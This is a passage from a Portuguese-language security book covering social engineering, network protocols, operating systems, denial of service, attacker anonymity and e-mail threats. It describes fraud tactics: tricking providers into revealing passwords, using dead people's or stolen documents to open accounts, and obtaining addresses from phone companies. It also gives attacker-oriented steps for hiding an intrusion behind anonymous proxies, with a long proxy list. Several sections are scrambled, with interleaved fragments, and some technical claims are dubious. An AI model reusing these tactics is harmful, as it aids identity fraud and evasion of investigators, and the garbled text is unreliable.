E quando fazem compra os carders vão buscá-las na própria firma ou mandam entregar em um endereço falso como uma casa alugada só para isso.

No capítulo 5 este assunto é tratado de uma forma mais prática.

Daí vêem a importância do bom administrador para a segurança da rede. E com certeza ele é sempre alvo e muitas

criticas.

1.8 Trapaceando para descobrir informações É uma prática muito usada, quando você quer descobrir uma

senha, você liga para o provedor e diz que esqueceu sua senha, provavelmente o suporte já cansado e sem muita vontade logo lhe informará. Desta mesma forma pode ser após descobrir a documentação de uma pessoa abrir contas virtuais, assinar provedores e até pedir um telefone. Claro que pode dar confusão, mas e se o dono da documentação for um defunto? Ou ele morar lá no ceara e você no rio de janeiro? É obvio que o estelionatário não trará muitos problemas.

Se quiser o endereço de uma pessoa é muito fácil vá até a companhia telefônica e peça a segunda via da conta do fulano de tal, bom na hora eles já te entregam sem pedir documentos e você já terá o endereço da pessoa.

E isso também acontece em empresas aéreas. Enfim usando a esperteza é muito fácil descobrir certas

informações.

Terrorismo Tecnológico Aprenda Para Sobreviver

68

Vemos então como estamos vulneráveis a sermos descobertos, até mesmo por ladrões, seqüestradores...

Pelo site das empresas de telefonia se colocarmos o nome da pessoa e a cidade, ele nos traz então o endereço completo e o telefone.

Cuidado então!

Terrorismo Tecnológico Aprenda Para Sobreviver

69

_________________________Extra

Vamos entender mais sobre protocolos?

Protocolo é um conjunto de regras compartilhado sobre o

gerenciamento do fluxo de informações, que interagindo com as camadas mais baixas da rede tem como finalidade garantir o intercâmbio de informações ordenado e sem erros. Por viajarem em pacotes, protocolos diferentes podem ser empilhados em várias camadas na rede. Chamados isso de pilha de protocolos.

Os protocolos mais usados em locais são:

IPX/SPX: Baseado num conjunto criado pela Xerox chamado XNS. Padrão nas populares redes Novell Netware, o IPX/SPX, ou simplesmente IPX, também são robustos e muito seguros, porém menos complexos, e por isso indicados para redes locais.

NetBIOS: Criado pela IBM, é um protocolo simples e rápido.

Mesmo não tendo a complexibilidade e segurança de seus irmãos maiores o NetBIOS pode ser usado sem problemas em pequenas e médias redes locais.

NetBeui: Significa Network Basic End User Interface. Ele

suporta pequenas LAN’s é rápido e simples. Porém, tem uma estrutura arquitetônica inerente que limita sua eficiência à medida que a rede se expande. O protocolo netbios apenas deverá ser instalado caso haja a necessidade de comunicação com redes antigas (LAN manager).

Apple Talk: Desenvolvido pela Apple Computer para redes de

computadores padrão Macintosh. Por ser proprietário, seu uso também é restrito somente a redes com este tipo de computador.

Terrorismo Tecnológico Aprenda Para Sobreviver

70

TCP/IP: Com raízes no Departamento de Defesa Norte-

Americano, o TCP/IP é o protocolo usado na Internet e o mais usado no mundo hoje. O TCP/IP foi projetado para interligar computadores à distância, por isso é robusto, confiável e seguro. Embora possa ser utilizado sem problemas em LANs, sua complexibilidade sugere que seu uso seja voltado para as WANs.

SNA: Desenvolvido pela IBM para seus computadores de

grande e médio porte seu uso está restrito somente a esta área.

Veja a seguinte tabela!

Aplicativo netbios IPX/SPX TCP/IP Integrar com NetWare

X

Conectar a Internet X Trabalhar com UNIX X Roteamento (WAN) X Rede grande X Rede pequena X X X

Terrorismo Tecnológico Aprenda Para Sobreviver

71

Capítulo II Sistemas Operacionais - Neste capítulo será tratado as

influencias que um determinado sistema operacional influi na hora do ataque, e se existe um sistema operacional mais seguro do que o outro.

Terrorismo Tecnológico Aprenda Para Sobreviver

72

Sabemos que todos os computadores possuem sistemas operacionais, e os computadores de bordo não são diferentes. Para se comunicar com algum software seja banco de dados, e-mail, protocolos ou qualquer outro dispositivo é necessário que nesta máquina esteja instalado um S.O. (Sistema Operacional).

Sabia que muitos televisores, ar condicionado, secador de roupa, microondas possui um sistema operacional, sendo este geralmente o UNIX?

2.1 Windows X Unix

Tanto o Unix quanto o Windows trabalham com multi-tarefas. As várias versões de cada S.O., como (Debiam Linux, Guarani,

Windows 98, Windows XP e muitos outros.). O Windows possui uma larga vantagem sobre os outros

sistemas operacionais inclusive o Unix e seus derivados. Esta vantagem é na parte de usuários e pequenos técnicos e a facilidade e simplicidade de usar os recursos já que eles são em formatos de “janelas” o que facilita a visualização e é muito fácil de instalar programas, drivers, e inclusive o próprio sistema operacional, que praticamente se instala sozinho usando a tecnologia plug and play.

Muito importante também é que praticamente todos os softwares encontrados no mercado são para plataforma Windows.

Na plataforma Unix têm: - Distribuição gratuita (como é o caso do Linux), não requer

pagarmos fortunas com o sistema operacional e nem com suas atualizações.

Terrorismo Tecnológico Aprenda Para Sobreviver

73

- Criptografia inquebrável de senhas. - Melhores ferramentas de rede como gerenciamento de portas. - Melhor gerenciamento de permissões - Código-fonte aberto

2.2 Vantagens do UNIX

A grande vantagem é que ele tem o código-fonte aberto (open-source). Isso significa que junto com o SO e programas, vem o seu código fonte e você pode alterá-lo, saber exatamente o que esta sendo executado e como funciona.

Já que temos o código fonte pode-se então fazer a sua própria versão do sistema operacional, fazendo com que ele execute e haja exatamente como o programador queira.

Desvantagens Unix Um problema do Unix é que ele é um tanto complicado para

usuários comuns o utilizarem sendo que muitas de suas funções somente são acessadas via linha de comando.

O SO é gratuito, mas os aplicativos que são feitos por encomendas estão cada vez mais ficando absurdamente caros.

Para instalar e configurar a plataforma também tem que se ter um especialista. E para os usuários tem que de dar um curso para trabalhar com o sistema.

Terrorismo Tecnológico Aprenda Para Sobreviver

74

Desvantagens do Windows O SO e muitos dos seus aplicativos como o Office custam uma

fortuna. Quando você compra um software eles lançam um mais novo e

melhor. Tanto o Windows como o Unix inesperadamente uma vez ou

outra travam sem motivo.

2.3 Configurações mal planejadas e erradas

Contas padrões do sistema, serviços desnecessários ativos (portas), erros em permissões de arquivos e muitas senhas padrão ou de senhas como data de nascimento, são ainda as maiores falhas por causa de descuido. As contas padrões são perigosas, pois qualquer pessoa que já tenha utilizado um sistema Server as conhece. No do Unix contas como bin e admin já vêm com senhas padrões de acesso ao sistema. Assim como no Windows também têm algumas como convidados. Desabilite-as ou mude as senhas. Quanto aos serviços e portas, se não estiver utilizando-as desabilite-as.

Usar também uma proteção em que devidos IPs e usuários não possam acessar determinados dados e softwares. Essas permissões são muito importantes e devem ser utilizadas. Somente com senha esses dados poderão ser acessados, usados, copiados e apagados.

Terrorismo Tecnológico Aprenda Para Sobreviver

75

2.4 Ataques restritos a um tipo de sistema

Para Windows existem milhões de vírus e trojans, já para o Unix estes praticamente não existem.

Já o Unix tem falhas como no sendmail já no Windows o sendmail funciona perfeitamente.

Ma hoje é muito fácil de se encontrar em páginas hacker (é só procurar em www.google.com.br) programas específicos como trojans para linux, trojans para Windows, vírus, scanners, sniffers....

2.5 O que é DNS, SMTP, SNMP? (Entenda Mais)

2.5.1 O que é DNS?

O DNS (Domain Name System) é um esquema de gerenciamento de nomes, hierárquico e distribuído. O DNS define a sintaxe dos nomes usados na Internet, regras para delegação de autoridade na definição de nomes, um banco de dados distribuído que associa nomes a atributos (entre eles o endereço IP) e um algoritmo distribuído para mapear nomes em endereços. O DNS e especificado nas RFCs 882, 883 e 973. As aplicações normalmente utilizam um endereço IP de 32 bits no sentido de abrir uma conexão ou enviar um datagrama IP. Entretanto, os usuários preferem identificar as máquinas através de nomes ao invés de números. Assim é necessário um banco de dados que permita a uma aplicação encontrar um endereço, dado que ela

Terrorismo Tecnológico Aprenda Para Sobreviver

76

conhece o nome da máquina com a qual se deseja comunicar. Um conjunto de servidores de nomes mantém o banco de dados com os nomes e endereços das máquinas conectadas a Internet. Na realidade este e apenas um tipo de informação armazenada no domain system (sistema de domínios). Note que e usado um conjunto de servidores interconectados, ao invés de um único servidor centralizado. Há atualmente tantas instituições conectadas a Internet que seria impraticável exigir que elas notifiquem uma autoridade central toda vez que uma máquina é instalada ou troque de lugar. Assim, a autoridade para atribuição de nomes e delegada à instituições individuais. Os servidores de nome formam uma arvore, correspondendo a estrutura institucional. Os nomes também adotam uma estrutura similar. Um exemplo típico é o nome segurança.xxx.br Para encontrar seu endereço Internet, pode ser necessário o acesso a ate quatro servidores de nomes. Inicialmente deve ser consultado um servidor central, denominado servidor raiz, para descobrir onde esta o servidor br. O servidor br é o responsável pela gerencia dos nomes das instituições/empresas brasileiras ligadas a Internet. O servidor raiz informa como resultado da consulta o endereço IP de vários servidores de nome para o nível br (pode existir mais de um servidor de nomes em cada nível, para garantir a continuidade da operação quando um deles para de funcionar). Um servidor do nível br pode então ser consultado, devolvendo o endereço IP do servidor xxx. De posse do endereço de um servidor xxx e possível solicitar que ele informe o endereço de um servidor jxh, quando, finalmente, pode-se consultar o servidor jxh sobre o endereço da máquina chupeta. O resultado final da busca é o endereço Internet correspondente ao nome segurança.jxh.xxx.br Cada um dos níveis percorridos e referenciado como sendo um domínio. O nome completo segurança.jxh.xxx.br é um nome de domínio. Na maioria dos casos, não é necessário ter acesso a todos os domínios de um nome para encontrar o endereço correspondente, pois os servidores de nome muitas vezes possuem informações sobre mais de um nível de domínio o que elimina uma ou mais consultas. Alem disso, as aplicações normalmente têm acesso ao DNS através de um processo local (servidor para as aplicações e

Terrorismo Tecnológico Aprenda Para Sobreviver

77

um cliente DNS), que pode ser implementado de modo a guardar os últimos acessos feitos, e assim resolver a consulta em nível local. Essa abordagem de acesso através de um processo local simplifica e otimiza a tarefa das aplicações no que tange ao mapeamento de nomes em endereços, uma vez que elimina a necessidade de implementar, em todas as aplicações que fazem uso do DNS, o algoritmo de caminhamento na arvore de domínios descrito anteriormente. O DNS não se limita a manter e gerenciar endereços da Internet. Cada nome de domínio e um nó em um banco de dados, que pode conter registros definindo várias propriedades. Por exemplo, o tipo da máquina e a lista de serviços fornecidos por ela. O DNS permite que seja definido um aliás (nome alternativo) para o no. Também e possível utilizar o DNS para armazenar informações sobre usuários, listas de distribuição ou outros objetos. O DNS é particularmente importante para o sistema de correio eletrônico. No DNS são definidos registros que identificam a máquina que manipula as correspondências relativas a um dado nome, identificado assim onde um determinado usuário recebe suas correspondências. O DNS pode ser usado também para definição de listas para distribuição de correspondências

2.5.2 O que é SMTP?

O SMTP (Simple Mail Transfer Protocol) é o protocolo usado no sistema de correio eletrônico na arquitetura Internet TCP/IP. Um usuário, ao desejar enviar uma mensagem, utiliza o módulo interface com o usuário para compor a mensagem e solicita ao sistema de correio eletrônico que a entregue ao destinatário. Quando recebe a mensagem do usuário, o sistema de correio eletrônico armazena uma copia da mensagem em seu spool (área do dispositivo de armazenamento), junto com o horário do armazenamento e a identificação do remetente e do destinatário. A

Terrorismo Tecnológico Aprenda Para Sobreviver

78

transferência da mensagem é executada por um processo em background, permitindo que o usuário remetente, após entregar a mensagem ao sistema de correio eletrônico, possa executar outras aplicações. O processo de transferência de mensagens, executando em background, mapeia o nome da máquina de destino em seu endereço IP, e tenta estabelecer uma conexão TCP com o servidor de correio eletrônico da máquina de destino. Note que o processo de transferência atua como cliente do servidor do correio eletrônico. Se a conexão for estabelecida, o cliente envia uma cópia da mensagem para o servidor, que a armazena em seu spool. Caso a mensagem seja transferida com sucesso, o servidor avisa ao cliente que recebeu e armazenou uma copia da mensagem. Quando recebe a confirmação do recebimento e armazenamento, o cliente retira a copia da mensagem que mantinha em seu spool local. Se a mensagem, por algum motivo, não for transmitida com sucesso, o cliente anota o horário da tentativa e suspende sua execução. Periodicamente o cliente acorda e verifica se existem mensagens a serem enviadas na área de spool e tenta transmiti-las. Se uma mensagem não for enviada por um período, por exemplo, de dois dias, o serviço de correio eletrônico devolve a mensagem ao remetente, informando que não conseguiu transmiti-la. Em geral, quando um usuário se conecta ao sistema, o sistema de correio eletrônico e ativado para verificar se existem mensagens na caixa postal do usuário. Se existirem, o sistema de correio eletrônico emite um aviso para o usuário que, quando achar conveniente, ativa o módulo de interface com o usuário para receber as correspondências. Uma mensagem SMTP divide-se em duas partes: cabeçalho e corpo, separados por uma linha em branco. No cabeçalho são especificadas as informações necessárias para a transferência da mensagem. O cabeçalho e composto por linhas, que contem uma palavra-chave seguida de um valor. Por exemplo, identificação do remetente (palavra-chave "to:" seguida do seu endereço), identificação do destinatário, assunto da mensagem, etc... No corpo são transportadas às informações da mensagem propriamente dita. O formato do texto e livre e as mensagens são transferidos no formato texto. Os

Terrorismo Tecnológico Aprenda Para Sobreviver

79

usuários do sistema de correio eletrônico são localizados através de um par de identificadores. Um deles especifica o nome da máquina de destino e o outro identifica caixa postal do usuário. Um remetente pode enviar simultaneamente varias cópias de uma mensagem, para diferentes destinatários utilizando o conceito de lista de distribuição (um nome que identifica um grupo de usuários). O formato dos endereços SMTP e o seguinte: nome_local@nome_do_dominio onde o nome_do_dominio identifica o domínio ao qual a máquina de destino pertence (esse endereço deve identificar um grupo de máquinas gerenciado por um servidor de correio eletrônico). O nome local identifica a caixa postal do destinatário. O SMTP especifica como o sistema de correio eletrônico transfere mensagens de uma máquina para outra. O módulo interface com usuário e a forma como as mensagens são armazenadas não são definidos pelo SMTP. O sistema de correio eletrônico pode também ser utilizado por processos de aplicação para transmitir mensagens contendo textos.

2.5.3 O que é SNMP?

O sistema de gerenciamento de rede da arquitetura Internet TCP/IP opera na camada de aplicação e baseia-se no protocolo SNMP (Simple Network Management Protocol). Os padrões que definem a estrutura de gerenciamento de redes Internet são descritos nos documentos RFC-1155 (Structure Of Management Information), RFC-1156 (Management Information Base) e RFC-1157 (Simples Network Management Protocol). Como no esquema de gerenciamento OSI, os processos que implementam as funções de gerenciamento Internet atuam como agentes ou gerentes. Os agentes coletam junto aos objetos gerenciadas as informações recolhidas pelos clientes, com o objetivo de detectar a presença de falhas no funcionamento dos componentes da rede (hosts,

Terrorismo Tecnológico Aprenda Para Sobreviver

80

gateways, processos executando os protocolos de comunicação, etc...), para que possam ser tomadas providencias no sentido de contornar os problemas que ocorrem como conseqüência das falhas. Um objeto gerenciado representa um recurso que pode ser um sistema hospedeiro (estação de trabalho, servidor de terminais, etc...), um gateway ou um equipamento de transmissão (modem, pontes, concentradores, etc...). Cada objeto gerenciado e visto como uma coleção de variáveis cujo valor pode ser lido ou alterado. O gerente envia comandos aos agentes, solicitando uma leitura no valor das variáveis dos objetos gerenciados (get e response), ou modificando seu valor (put). A modificação do valor de uma variável pode ser usada para disparar indiretamente a execução de operações nos recursos associados aos objetos gerenciados (por exemplo, umas reiniciarão). Na troca de informações entre o gerente e o agente, são aplicados mecanismos de autenticação para evitar que usuários não autorizados interfiram no funcionamento da rede. A troca de mensagens entre o gerente e o agente é definida pelo protocolo SNMP. O SNMP define o formato e a ordem que deve ser seguida no intercambio de informações de gerenciamento. As informações sobre os objetos gerenciados são armazenados na MIB (Management Information Base), que contem informações sobre o funcionamento dos hosts, dos gateways, e dos processos que executam os protocolos de comunicação (IP, TCP, ARP,...). A MIB e especificada em ASN.1. O funcionamento do SNMP baseia-se na troca de operações que permitem que o gerente solicite que o agente lhe informe, ou modifique, o valor de uma variável de um objeto na MIB. O SNMP define também uma operação (trap), que permite que um agente informe ao gerente a ocorrência de um evento especifico. Com o objetivo de permitir o uso do esquema de gerenciamento OSI em redes que adotam a arquitetura Internet TCP/IP, foi definido o protocolo de gerenciamento CMOT (CMIP Over TCP/IP). O CMOT utiliza o serviço CMIS (Common Management Information Service) e o protocolo CMIP (Common Management Information Protocol) funcionando sobre uma conexão TCP/IP. O CMTU e descrito na RFC-1095. Alexandre Lopes -------------------- Mensagem editada por Tira Acentos 1.00 -

Terrorismo Tecnológico Aprenda Para Sobreviver

81

Diabolik Dreamz Soft, 1995 MLº Alguém teria algum artigo em português sobre o que é ºDNS em um servidor, ou ate mesmo uma explicação de forma simples para ºque serve o DNS, sei somente que ele faz troca de nome por número. É exatamente isso. Você da um nome pra ele e ele fala o endereço IP (números) correspondente aquele nome. Pra que serve isso? Pacotes IP têm de ser endereçados por números, mas é extremamente incomodo pra seres humanos decorar números. A solução foi usar um serviço que fizesse a tradução de um para outro. Quando você faz uma conexão com www.shareware.com o seu browser faz uma conexão com um servidor DNS pedindo o endereço IP correspondente à string "www.shareware.com". O DNS tenta resolver isso localmente, mas se não conseguir propaga a consulta pra outros servidores DNS ate conseguir (ou não) a resposta, e então retorna o endereço pro browser que continua a conexão. Os nomes no estilo aaa.bbbbbb.cc.dddd.e são conseqüência da estrutura hierárquica usada na distribuição dos nomes, e essa estrutura é usada pra melhorar a eficiência na busca.

2.6 Ataques Universais

São ataques que trabalham no nível de protocolo (para saber mais leia sobre modelo OSI da ISO), como o IP Spoof, com ele, pode ser acessada qualquer máquina independente do sistema operacional ali instalado. Não importa então o S.O. do invasor e do invadido. Mesmo que for, por exemplo, Linux e Novell, Windows VMS ou outro Unix.

O que acontece é que o protocolo TCP/IP é universal, isto é esse protocolo roda em qualquer sistema operacional exatamente para poder fazer a troca de informações.

Este protocolo faz uma conversão para que no outro sistema ao converter estes dados consiga entendê-los.

Terrorismo Tecnológico Aprenda Para Sobreviver

82

Agora como todos os SO conseguem trabalhar desta forma “com esta conectividade” pode-se usar isto para atacá-los, não importando qual plataforma esta rodando localmente.

Extra

Ataque por recusa de serviço

Este é o Denial of Service (DOS) ou Recusa de serviço.

Esse ataque consiste em enviar a máquina alvo com dezenas ou centenas de pacotes de informação, fazendo com que esta não consiga processar a todos os pacotes e consuma toda a sua memória, com isso a máquina trava, pois não consegue executar mais nenhuma tarefa. Porém esse ataque apenas causa danos temporários, como fazer esse servidor parar por alguns momentos e não fornecer os seus serviços.

Claro que isso faz o administrador ficar irritado, mas é só reiniciar o sistema e tudo estará de volta ao normal.

Mas não rouba e nem vê nada ali instalado. Este ataque pode ser usado para retirar um site do ar, um bom

exemplo é o ataque se foi planejado para retirar do ar o site www.windowsupdate.com, mas a Microsoft antes de sofrer o ataque absurdamente o retirou do ar, estranho pois parece que ficaram com medo só ataque. Isto aconteceu dia 16-08-2003.com o ataque do vírus worm Blaster

Terrorismo Tecnológico Aprenda Para Sobreviver

83

Capítulo III Anonimidade – Claro que um invasor não irá querer ser

descoberto e aí entra a parte de se camuflar, despistar, enfim fazer ninguém descobrir quem invadiu o sistema.

Terrorismo Tecnológico Aprenda Para Sobreviver

84

3.1 Anonimidade O ato de ficar anônimo na Internet ou em qualquer lugar serve

exatamente para não ser descoberto, provavelmente por que o que o anônimo está fazendo é algo proibido ou ele quer se passar por outra pessoa.

As formas geralmente usadas são um Shell invadido, um Proxy ou uma pessoa infectada por um trajam.

Com tudo isso pode invadir o sistema sem ser pego ou mandar e-mails anonimamente.

Geralmente ele se conecta através de contas falsas, Cyber Cafés, com números de documentos forjados ou roubados.

Ficar totalmente indetectável, e não ser pego por nenhum

agente é uma coisa muito fácil de ser feita. E não é preciso de nenhum software mágico e sim de alguns conhecimentos. Tudo é feito fazendo uma espécie de roteamento. Antes de invadir uma máquina em São Paulo esse invasor se conecta a Finlândia e a partir de lá ele se conecta em São Paulo.

Nem por um super segurança em informática ele será pego.

3.2 Proxy (O Proxy é o que dá ao invasor o melhor resultado!)

O Proxy, é na verdade, uma ponte entre um servidor e um

cliente. Quando se faz à conexão há um Proxy tudo o que você entra

pela Internet antes de fazer ou ser pedido ao site desejado é feito ao Proxy, este, por sua vez, refaz o pedido ao site desejado. O site responde ao Proxy e ele agora vê para quem é o conteúdo e envia de volta ao invasor.

Terrorismo Tecnológico Aprenda Para Sobreviver

85

Por isso não da para saber o endereço de quem está invadindo, pois o Proxy refez todo o pedido com suas informações (IP) e não com as informações do invasor.

Simplesmente é usado um Proxy1 anônimo que é facilmente

achado na Internet.

Para uma maior compreensão abaixo está à demonstração de como todo o processo é feito.

Após ter o endereço deste “roteador”, entre no Painel de

Controles – Propriedades da Internet. - Clique em conexão - Em servidor de Proxy ative-o. Digamos que o endereço do

servidor que você conseguiu seja: 200.202.202.1:8080 Este é um endereço fictício não sei se ele funciona, e nem sei

se alguém o utiliza ou se ele existe. - O Endereço então será: 200.202.202.1 - E a porá será: 8080 Depois é só clicar em OK e pronto já estará anônimo. A imagem a seguir mostra como é feito no Windows XP. Para

fazer a configuração, o usuário já tem que estar conectado. 1 Uma lista de Proxy anônimo geralmente é pega pelo invasor em http://www.multiproxy.org/txt_anon/proxy.txt

Terrorismo Tecnológico Aprenda Para Sobreviver

86

3.3 Usando o anonymizer

mo é um servidor Proxy se o Administrador do site ou um sis

Este é um serviço gratuito2 na Internet, visitando a sua

HomePage (www.anonymizer.com) ele possibilita que você digite algum endereço e seja redirecionado por ele até a página desejada.

E cotema invadido for consultar os logs de quem o visitou verá o log

do anonymizer e não o do invasor.

2 O serviço gratuito somente o deixa usar o http para usar ftp e outros devem ser pagos.

Terrorismo Tecnológico Aprenda Para Sobreviver

87

3.4 Remailers

O Remailer serve para enviar e-mails anonimamente. Com ele não é preciso se conectar a um servidor SMTP para fazer o envio, o próprio remailer já é um servipode ser usado o wing to mais garantido. Mas caso o invasor tiver enviado um monte de e-mails para inundar uma caixa posta real revelado.

Existem o ls, IP Spoof, Non-blind spoof e Blind arei cada um, pois são menos utilizados, pois os.

A questão é que n método que o invasor vai usar para ficar a e deve ter uma boa defesa para ele não c is depois de feito será muito difícil p

y

194.muja.pitt.washdctt.dsl.att.net:80

customer-148-223-48-114.uninet.net.mx:80

bpubl007.hgo.se:3128 w

AStra fr:80

dor anônimo. Mas como precaução ate, pois com ele é mui

l pode ter o seu IP

utras maneiras como por Shells, Outdia spoof, não explic

é gurá-lmuito difícil confi

ão importa qual será o nô snimo, mas sim que

o onseguir invadir, pegá-lo.

3.5 Lista de Prox

164.58.28.250:80

web.khi.is:80

163.24.133.117:80 164.58.18.25:80

bpubl014.hgo.se:3128

ww.reprokopia.se:8000193.188.95.146:8080 193.220.32.246:80

sbourg-201-2-1-26.abo.wanadoo.gennet.gennet.ee:80

Terrorismo Tecnológico Aprenda Para Sobreviver

88

pandora.teimes.gr:8080 mail.theweb.co.uk:8000 mail.theweb.co.uk:8888

ntbkp.naltec.co.il:8080 195.103.8.10:8080

server.sztmargitgimi.sulinet.hu:80

lvsweb.lasvegasstock.com:8000 musalemnt.notariamusalem.cl:80

ip-36-018.guate.net.gt:80

ntserver1.comnt.com.br:80 200-204-182-137.terra.com.br:80

isdn 80 isdn :80 isdn0 r:80

adao.dei.unicap.br:80 gateway.andromaco.cl:80

p75-90.cmet.net:8080 jaamsa.com:3128

host031210.ciudad.com.ar:80 host071052.arnet.net.ar:8000

202.104.189.20:8080

194.6.1.219:80 194.79.113.83:8080

pools1-31.adsl.nordnet.fr:80 pools1-98.adsl.nordnet.fr:80

195.167.64.193:80

los.micros.com.pl:80 195.47.14.193:80

mail.voltex.co.za:8080 196.23.147.34:80 196.40.43.34:80

200.135.246.2:80

200.21.225.82:8080 200.211.98.5:80

02201.cultura.com.br:02204.cultura.com.br3021.cultura.com.b

mail.care.org.gt:80

200.46.109.82:80 200.52.4.82:80

correo.cfired.org.ar:80 200.61.6.50:8080

202.103.6.178:3128

Terrorismo Tecnológico Aprenda Para Sobreviver

89

202.104.20.181:80 202.105.138.19:8080

202.106.139.88:80

202.99.225.45:8080

aworkla :3128

203.200.75.165:80

203.69.244.194:80

h209-17-147-1.gtconnect.net:80

cr20 :80

210.204.118.194:8080

210.82.40.243:8080

202.105.230.226:80

202.108.122.38:80 202.110.204.18:80 202.110.220.14:80

mail.jjs.or.id:80 cair.res.in:80

smtp2.info.com.ph:80 202.9.136.40:8080

203.113.34.239:80 203.117.67.122:8080 203.123.240.112:80

proxy.nida.ac.th:8080 203.151.40.4:80

203.155.16.130:80 203.155.172.60:80

n003105.netvigator.comesjv.com.hk:80

cp.chollian.net:80 yuluma.wa.edu.au:80

223-mail.internet.ve:8080 mail.bravocorp.com:8080

206.49.33.250:8080 207.61.38.67:8000

209.47.38.116:8000 98859123.cable.net.comail.unisol.com.ar:80

210.12.86.181:80

210.21.93.141:3128 210.219.227.52:8080 210.242.164.150:80

210.8.92.2:80

Terrorismo Tecnológico Aprenda Para Sobreviver

90

210.92.128.194:8080 210.96.65.4:80

host2110 co.jp:80 www :80

211.21.111.227:8080

211.45.21.165:8080 dns1.daiken-c.co.jp:80

TK212017066196.teleweb.at:80

adslb-98-18.cytanet.com.cy:80

adsl-216-158-25-110.cust.oldcity.dca.net:80 norm :80

216-238- .net:80

217-127-24 d.es:3128

host217-34-153 orld.com:8080 host217-34-19 world.com:80

host217-37-205 orld.com:8080

00070226.kagaku-k..kan-shoku.co.jp

ns.toyoriko.co.jp:80 211.114.116.60:80 211.165.192.8:80

211.233.21.166:8080

dns.lpgc.or.jp:80 211.93.108.113:8080 212.12.157.130:8000

enteleca-2.dsl.easynet.co.uk:80

212.251.36.62:80

212.38.132.122:80 212.60.65.206:8080

is2.isys.no:8000 213.121.248.138:80 213.16.133.130:80 213.176.28.6:80

acode-u.org:8080 213.25.170.98:8080

213.25.29.12:80 p038-30.netc.pt:80

xirus.com:8080

andintransit.com112-40.dsl.ct.thebiz216.72.196.21:80 216.72.63.198:80

216.72.63.198:8080 8-37.uc.nombres.tt

217.153.114.66:8080 -161.in-addr.btopenw4-49.in-addr.btopen

-177.in-addr.btopenw

Terrorismo Tecnológico Aprenda Para Sobreviver

91

host182-44.p ness.it:8000

h0040f6a4e0 i.com:8080

cm61-15 .hk:80

adsl-63-192-134 acbell.net:8080 ftp.aparizona.com:80

64-132-153-94.gen.twtelecom.net:8000

AS7000_1B.sfn.co.jp:8080 ns.cyberlinks-jp.com:80

210.163.167.162:80

204.196.104.27:80

mertennt.merten.hu:80 61.142.169.98:80

ns.proserv.co.jp:80 www.nisshin-syouji.co.jp:80

202.9.136.40:80 210.254.8.52:8000 www.qdh.or.jp:80

207.167.236.137:80 210.74.254.35:80

ool21758.interbusihost162-51.pool21759.interbusiness.it:80

217.66.203.82:3128 218.5.133.146:80

2.magicbird.co.jp:80 19.ne.client2.attb4.22.156.10:80 61.11.26.150:80

61.131.48.219:80 61.133.63.129:80

61.138.130.229:8080 -14-187.hkcable.com61.159.224.11:80

61.159.235.36:8080 61.180.73.66:8080 61.185.255.4:3128 61.32.11.130:8080 www.flab.fr:8080 -107.dsl.snfc21.p

ensait19.ensait.fr:80 ado.com.mx:80

211.15.62.123:8000

h64-5-220-82.gtcust.grouptelecom.net:80

ftp.orange.uk.com:8000 maq241i.advance.com.ar:80

Terrorismo Tecnológico Aprenda Para Sobreviver

92

219.163.108.18:8080 mail.koibuchi.ac.jp:80 dns1.koibuchi.ac.jp:80

Para uma melhor consulta de proxys ativos consulte:

http://www.multiproxy.org/txt_anon/proxy.txt

Terrorismo Tecnológico Aprenda Para Sobreviver

93

Capítulo IV

E-mails - Neste capítulo será discutido os problemas enfrentados com os e-mails, sendo estes um grande causador de problemas, e o serviço de troca de mensagens, cartas, documentos e arquivos mais utilizados na Internet.

Terrorismo Tecnológico Aprenda Para Sobreviver

94

4.1 Encarando problemas com E-Mail

Um grande problema que vem assustando programadores, usuários e administradores são os vírus transmitidos por correntes em arquivos anexos ou camuflados.

Esses podem agir em arquivos de sistemas, executáveis, dll, banco de dados... Podem também vir com um trojan embutido. Este por sua vez abrirá um quina infectada, e esta ficará aberta para possíveis ataques.

Es

sconfigurando ou embaral

a porta na má

tes ataques podem ser roubo de informações, fazer um desvio de trafego (assim tudo que chegar e for enviado desta máquina passará por outra e esta por sua vez será uma máquina espiã) ou serem vírus destrutivos, apagando de

hando informações úteis do sistema ou informações do usuário (banco de dados, arquivos etc).

A forma de se combater é ter uma máquina com um ótimo antivírus que analise a cada e-mail que chegue. Porém, nem sempre o antivírus terá no seu banco de dados o vírus, então uma boa política de segurança é imprescindível.

4.2 Spam

Spam na verdade são mensagens mandadas em série, isto é são aqueles e-mails que o pentelho de um amigo seu fica te repassando, como piadas, mensagens, textos...

Há também sites que após um cadastro, ficam mandando noticias, previsões de tempo, anúncios de compra e venda entre

Terrorismo Tecnológico Aprenda Para Sobreviver

95

outros. Até parece interessante durante alguns dias, mas logo você não vai mais ter interesse e só servirá para lotar sua caixa de e-mails.

problema é bem mais grave do que se pensa, já que junto ao e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-ma

, você pode bloquear os e-mails, estes podem ser a partir de de

are que você utiliza para ver as suas correspondências (geralmente todos softwares de e-mail possuem está função). Ou então pela própria página prestadora de serviços de e-mail como o bol, globo.com, H

viços de Spam são utilizados para este, o e-mail bomba consiste no envio de muitos e-mails em um tempo mu

Não há muito que fazer neste caso a não ser usar o antivírus e se a máquina travar reiniciá-la e após isso apagar este e-mail.

4.4 Remetente falso ou anônimo

O

il o computador estará infectado. Então, desde já, instale um bom antivírus que proteja não só a máquina, mas que também cheque todos os e-mails recebidos e enviados.

Para parar de receber as correspondências de Spam

terminados conteúdos ou de um determinado usuário. Para bloquear você pode utilizar uma opção no Outlook ou no softw

otmail etc.

4.3 E-Mail Bomba

Às vezes até ser

ito rápido, ou pode ser um e-mail que se reproduz, assim quando o usuário o abrir ele se multiplicará, o sistema provavelmente vai ficar superlotado e a máquina vai travar.

Terrorismo Tecnológico Aprenda Para Sobreviver

96

O serviço de SMTP3 não requer uma autenticidade, então qualquer um pode mandar um e-mail dizendo que é qualquer pessoa. Você pode mandar um e-mail dizendo que é o presidente de alguma empresa, ou algum distribuidor, enfim pode se dizer que é qualquer um.

Daí vem à necessidade de uma marca d´agua nos e-mails mais importantes, ou uma assinatura eletrônica, para comprovar a autenticidade dos e-mails, esses por sua vez muito frágeis a falsificações.

4.5 E-mails com arquivos auto executáveis

pefuO maticamente. Só que este software pode ser um vírus ou um trojan.

Existem alguns programas como o MIME que faz que um queno software se auto execute e instale no sistema, ele

nciona como alguns programas como algumas versões do utlook, que ao receber uma foto ele a abre auto

Utilize antivírus e análise de onde vem cada e-mail.

4.6 Alerta

3 SMTP - é um protocolo destinado a fazer o envio das mensagens de e-mail. Ele se encarrega de enviar as mensagens até o servidor. Ele não requer senhas por isso é tão fácil de falsificá-lo.

Terrorismo Tecnológico Aprenda Para Sobreviver

97

O PROCON/SP E A ABRANET ALERTAM: CUIDADO COM

